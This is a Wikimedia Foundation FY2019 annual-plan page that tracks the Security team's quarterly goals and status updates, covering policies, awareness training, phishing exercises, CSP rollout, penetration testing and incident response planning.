Wikimedia Technology/Annual Plans/FY2019/CDP1: Privacy, Security, and Data Management/CDP Budget Segment 2/Goals

=Program Goals and Status for FY18/19=

Segment 2 - Security
 * Goal Owner: John Bennett
 * Program Goals for FY18/19: Develop, maintain and mature our privacy, security, and data management practices in order to protect Wikimedia community member and donor information, comply with applicable privacy and data protection regulations, and ensure safe and secure connection to Wikimedia projects and sites in accordance with the values of the movement.
 * Annual Plan: Segment 2 - Security
 * Primary Goal is Knowledge Equity: grow new contributors and content



 = Q1 Goals =

Outcome 1 / Output 1
Ensure the high-quality protection and security of our infrastructure and data.
 * Review and update current security policies, standards and procedures

Goal(s)

 * Review and mature our security policies and awareness functions:
 * Create or update 3 security policies
 * Provide Security Awareness training
 * Perform Phishing campaign

Status
July 2018


 * ✅ 1 of the 3 policies has been created
 * ✅ Define Awareness content

August 2018


 * Define additional policies to update/create
 * Draft version of "Protecting your Digital Identity" created for Awareness Campaign
 * On board vendor to support Phishing platform

September 12, 2018


 * Update/create identified password use policies and incident response policies
 * Provide awareness training (will be presented in October)
 * Perform phishing campaign, this will completed in Q2

Outcome 1 / Output 2
Ensure the high-quality protection and security of our infrastructure and data.
 * Reduce risk, improve application security practices, improve code quality, reduce vulnerabilities and attack surface and encourage a secure by design approach.

Goal(s)

 * Testing campaigns:
 * Implement CSP in alert only mode
 * Penetration testing for English Wikipedia site
 * Security Release
 * Analytics Risk Assessment and Threat Model

Status
July 2018


 * ✅ initial test rollout of CSP on test wiki
 * ✅ Define scope and onboard vendor for pen testing
 * identify elements for security release
 * ✅ identify and scope Analytics assessment

August 2018


 * Expand CSP rollout
 * Select pen testing dates
 * Prepare security release
 * identify and scope Analytics assessment

September 12, 2018


 * Expand CSP rollout
 * Complete pen testing--will start at end of September
 * Prepare security release (currently stalled based on hiring)
 * Complete Analytics assessment

Outcome 1 / Output 3
Ensure the high-quality protection and security of our infrastructure and data.
 * Increase maturity and capabilities in the event of a security incident.

Goal(s)

 * Perform 2 Incident Response table top exercises

Status
July 2018
 * ✅ Perform Incident response exercise

August 2018


 * ✅ Perform 2nd Incident response exercise

September 12, 2018

Update Incident Response Plan

 =Q2 Goals =

Due to major security incidents in October and November, all Security Resources were dedicated to working on them incidents and this negatively affected the ongoing scheduled work to be done by the team.

Outcome 1 / Output 1
Ensure the high-quality protection and security of our infrastructure and data.


 * Review and update current security policies, standards and procedures

Goal(s)

 * Review and mature our security policies and awareness functions:
 * Create or update 3 security policies
 * Provide Security Awareness training
 * Perform Phishing campaign

Status
October 18, 2018
 * On track to publish policy changes by the end of Oct
 * Awareness content created and ready to deliver
 * Phishing campaign will be delayed until Nov.

December 12, 2018
 * This is now ✅ — one training session for FR-Tech happened in November, and the new policy was used during that training. Blog will go out by end of December.
 * Phishing campaign is ❌ and hope to be done in early 2019

Outcome 1 / Output 2
Ensure the high-quality protection and security of our infrastructure and data.


 * Reduce risk, improve application security practices, improve code quality, reduce vulnerabilities and attack surface and encourage a secure by design approach.

Goal(s)

 * Testing campaigns:
 * Implement CSP in alert only mode
 * Penetration testing for mobile apps
 * Security Release
 * OIT Risk Assessment and Threat Model
 * NIST CSF style assessment
 * Consider incorporation of Phan-taint-check into MW Core

Status
October 18, 2018


 * CSP changes in progress
 * 1st round of pen testing (on en wikipedia)will conclude by the end of Oct.
 * OIT assessment will be pushed into at least Nov
 * NIST CSF assessment on track to begin in Oct but will conclude likely in Nov.
 * Initial discussion have begun to include Phan into MW core but will not be completed in Oct.

December 12, 2018
 * CSP changes are now ✅
 * 1st round of pen testing (on en wikipedia) is ✅
 * OIT assessment is ❌, might be picked up in 2019.
 * NIST CSF assessment is ❌, should be picked up again in early 2019.
 * Initial discussion is to include Phan into MW core and should be completed by end of December.

Outcome 1 / Output 3
Ensure the high-quality protection and security of our infrastructure and data.


 * Increase maturity and capabilities in the event of a security incident.

Goal(s)

 * Finalize and test our Incident Response documentation

Status
October 18, 2018
 * Final tabletop with Legal will be held on Oct 30.

December 12, 2018
 * This is with writing the documentation and should get published on MediaWiki sometime in late December. This goal will probably finish up in Q3 (early January). It has been throughly tested and will be published in January 2019.



= Q3 Goals =

Outcome 1 / Output 1
Ensure the high-quality protection and security of our infrastructure and data. Review and update current security policies, standards and procedures

Goal(s)
Review and mature our security policies and awareness functions:


 * Create or update 3 security policies
 * Provide Security Awareness training
 * Perform Phishing campaign
 * Security Code Review process improvements completed and published
 * Update/Consolidate security documentation

Status
January 9, 2019
 * Security policy updates are ('acceptable use' is first up)
 * Training is, working on revising content to be published later in January
 * Phishing campaign will start after the awareness training is done (most likely in Feb 2019)
 * Security code review improvements are and hope to be published by end of quarter (in review now)
 * Updating and consolidating security documentation is also

February 13, 2019
 * Security policy updates still with incident responses, we're hoping for 3 to be published this quarter.
 * Training is still and recently published https://www.mediawiki.org/wiki/Protecting_your_digital_identity
 * Phishing campaign will start in the next couple of weeks, going dept by dept to train folks.
 * Security code review improvements are and documentation is hoping to be released this week.
 * Updating and consolidating security documentation is still, we are inventorying all the docs we have now and consolidating (policy, SOP, standards, etc).

March 14, 2019
 * Security code review improvements is ✅
 * Updating and consolidating security documentation is but will finish up in Q4
 * Security policy updates are right now, and will complete by EOQ
 * Phishing campaign has been ❌ for Q4
 * Security code review improvements are but hope to be done by EOQ

Outcome 1 / Output 2
Ensure the high-quality protection and security of our infrastructure and data. Reduce risk, improve application security practices, improve code quality, reduce vulnerabilities and attack surface and encourage a secure by design approach.

Goal(s)

 * Expansion of CSP
 * Security Release
 * Analytics Risk Assessment and Threat Model
 * Incorporation of Phan-taint-check into MW Core
 * Evaluate dynamic scanners
 * Routine penetration testing

Status
January 9, 2019


 * Expansion of CSP (a long running goal) is as well as security release.
 * Risk assessment is also and should be done by end of Feb 2019
 * Incorporation of Phan-taint-check into MW Core is a bit slow to get going — adoption of getting it into Core is slow and might be delayed into Q4.
 * Dynamic scanner work will be completed in March or April 2019
 * Next round of penetration testing is using info from latest incidents

February 13, 2019
 * Expansion of CSP (a long running goal) is a bit ❌ but still expected to be done this quarter.
 * Security release is also ❌ and will most likely be pushed to Q4.
 * Risk assessment is also and should be done by end of Feb 2019
 * Incorporation of Phan-taint-check into MW Core is also ❌
 * Dynamic scanner work will be most likely be completed in Q4, or pushed into next FY. We'd like to do some manual scanning first, rather than building an automatic version.
 * Next round of penetration testing is still but we're not totally happy with the results from enwiki, so the vendor did the work again and got a Javascript threat model. We think we can call this ✅ for this quarter.

March 14, 2019
 * Expansion of CSP (a long running goal) is still ❌ for now - will be revised for Q4 work, and might take about a year to complete
 * Security release is also ❌, but looking to do a release in Q4
 * Risk assessment is and will be completed by EOQ
 * Incorporation of Phan-taint-check into MW Core (another long running goal), will transition the work within the team this quarter; it might take another 6 months to be fully incorportated into MediaWiki core.
 * Dynamic scanner work has been ❌ to Q4
 * Penetration testing is ✅ for this FY

Outcome 1 / Output 3
Ensure the high-quality protection and security of our infrastructure and data.


 * Increase maturity and capabilities in the event of a security incident.

Goal(s)

 * Perform tooling and process retro
 * Finalize and test our Incident Response documentation
 * Create incident play by play dashboard
 * Perform 1 large scale tabletop exercise

Status
January 9, 2019


 * Tooling and process retro will take place in Feb 2019
 * Response documentation finalization will be most likely completed in March 2019
 * play by play dashboard is
 * Large scale tabletop exercise will happen in March

February 13,, 2019
 * Tooling and process retro is during our All Hands offsite, but we'll need to do a bit more. This will become a longer running goal in the future.
 * Response documentation finalization has started, and will have a working version by EOQ.
 * Play by play dashboard is ❌ for now, we hope to get back to it.
 * Large scale tabletop exercise will happen in sometime in March, but the work might be moved into Q4.

March 14, 2019
 * Tooling and process retro was ✅ earlier in the quarter and we are still building out the incident response documentation from the last incident; this process will run into Q4 (mostly for alerting)
 * Incident Response documentation playbooks are still and will go into next FY
 * Incident play by play dashboard is now a stretch goal to be tackled in Q4
 * Large scale tabletop exercise has been ❌ to Q4



= Q4 Goals =

Outcome 1 / Output 1
Ensure the high-quality protection and security of our infrastructure and data. Review and update current security policies, standards and procedures

Goal(s)
Review and mature our security policies and awareness functions:


 * Create or update 3 security policies (ongoing goal)
 * Provide Security Awareness training (ongoing goal)
 * Perform Phishing campaign
 * Form Security Council
 * Form strategy and begin initial steps toward building a data governance platform
 * Form strategy and begin initial steps toward building a vulnerability management program
 * Assess current security logging capabilities (stretch goal)

Status
April 2019


 * Policy - updates and review of new Security Readiness Review SOP
 * Policy - SOP for creating new security policy has been drafted, and is in review
 * Policy - Acceptable Use Policy has been drafted, is in review, and scheduled to go effective in 10 June 2019
 * Policy - Security Incident Response policy is being drafted, due by end of 4Q 2019
 * Security Awareness/Phishing - Once the Acceptable Use Policy is approved, awareness sessions will be held
 * Data governance platform review and construction in progress
 * Vuln mgmt
 * Logging - needs update

May 30, 2019


 * Policy - reconcile and polish the Data Classification and Data Protection policies
 * ✅ Membership for Security Council selected, planning on 1st meeting in June
 * Policy - updates and review of new Security Readiness Review SOP
 * Policy - SOP for creating new security policy has been drafted, and is in review
 * Policy - Acceptable Use Policy has been drafted, is in review, and scheduled to go effective in June 2019
 * Policy - ✅ Security Incident Response policy is being drafted, due by end of 4Q 2019
 * Vuln mgmt -- Initial scans performed, evaluating scanning solutions and results.
 * Logging - Updates to alerting capabilities.
 * ❌ Perform Phishing campaign. Maybe catch up on some pieces next month.
 * Policy - update Data Classification policy.

June 2019

Outcome 1 / Output 2
Ensure the high-quality protection and security of our infrastructure and data. Reduce risk, improve application security practices, improve code quality, reduce vulnerabilities and attack surface and encourage a secure by design approach.

Goal(s)

 * Expansion of CSP (ongoing goal)
 * Security Release (ongoing goal)
 * Analytics Risk Assessment and Threat Model
 * Incorporation of Phan-taint-check into MW Core (stretch goal)
 * Phan 2.x development and release (stretch goal)
 * Evaluate dynamic scanners
 * Routine penetration testing
 * Polish and demo appsec docker “toolboxes” (PHP, Python)
 * Improve security tooling for Phab/Gerrit monitoring
 * Formalized process and SOP for concept/design reviews.
 * Generate initial security metrics/measurements

Status
April 2019


 * Routine penetration testing - Scoping
 * Phan 2.x development and release - 2.x branch created, updates cherry-picked, older patches reviewed and cherry-picked
 * Evaluate dynamic scanners - new task created T219567, tool review, meeting w/ ZAP lead dev (Simon @ Mozilla)
 * See: T221477, hopefully some WIP patches soon
 * Formalized process and SOP for concept/design reviews - still reviewing, see also related Output 1 goal
 * ✅ Improve security tooling for Phab/Gerrit monitoring - calling this done for this quarter

May 30, 2019


 * Routine penetration testing - Scoping completed, awaiting scheduling
 * Phan 2.x development and release - 2.x branch created, updates cherry-picked, older patches reviewed and cherry-picked
 * Evaluate dynamic scanners - new task created T219567, tool review, meeting w/ ZAP lead dev (Simon @ Mozilla)
 * See: T221477, hopefully some WIP patches soon
 * Formalized process and SOP for concept/design reviews - still reviewing, see also related Output 1 goal
 * ❌ Metrics generation, maybe catch-up next month.
 * ✅ Improve security tooling for Phab/Gerrit monitoring - calling this done for this quarter
 * ✅ Analytics Risk Assessment and Threat Model
 * Security release on track and scheduled for next month.

June 2019

Outcome 1 / Output 3
Ensure the high-quality protection and security of our infrastructure and data.


 * Increase maturity and capabilities in the event of a security incident.

Goal(s)

 * Perform tooling and process retro
 * Finalize and test our Security Incident Response documentation
 * Create incident play by play dashboard
 * Perform 1 large scale tabletop exercise

Status
April 2019

May 30, 2019
 * ✅ Security incident scale proposals drafted, now in review
 * Security Incident Response policy and supporting incident response playbooks are being drafted


 * Security incident scale proposals drafted, now in review
 * Security Incident Response policy and supporting incident response playbooks are being drafted
 * ❌ Create incident play by play dashboard and likely delayed until next quarter.

June 2019
 * Large scale tabletop exercise planned for late 4Q
 * Team Retro scheduled for June.